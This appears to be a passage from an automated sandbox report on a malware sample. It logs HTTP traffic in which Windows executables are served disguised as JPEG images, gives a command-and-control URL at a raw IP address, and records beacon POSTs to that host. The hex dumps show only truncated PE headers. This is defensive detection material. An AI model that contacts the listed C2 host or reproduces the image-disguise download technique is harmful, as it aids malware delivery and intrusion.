Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:30 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:44 GMT ETag: "1303d0-58a9fc5a65a00" Accept-Ranges: bytes Content-Length: 1246160 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:31 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:02:02 GMT ETag: "14748-58a9fc6b90280" Accept-Ranges: bytes Content-Length: 83784 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Posts data to a JPG file (protocol mismatch)

Source: unknown

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://2.56.57.108/osk/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GBTCLOUDUS GBTCLOUDUS

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /osk//6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//1.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//2.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//3.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//4.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//5.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//7.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//main.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk/ HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 87324Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cache

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:27 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:52 GMTETag: "235d0-58a9fc6206c00"Accept-Ranges: bytesContent-Length: 144848Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:28 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Sun, 06 Aug 2017 19:52:20 GMTETag: "9d9d8-5561b116cc500"Accept-Ranges: bytesContent-Length: 645592Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:28 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:00:58 GMTETag: "519d0-58a9fc2e87280"Accept-Ranges: bytesContent-Length: 334288Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:29 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:20 GMTETag: "217d0-58a9fc4382400"Accept-Ranges: bytesContent-Length: 137168Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 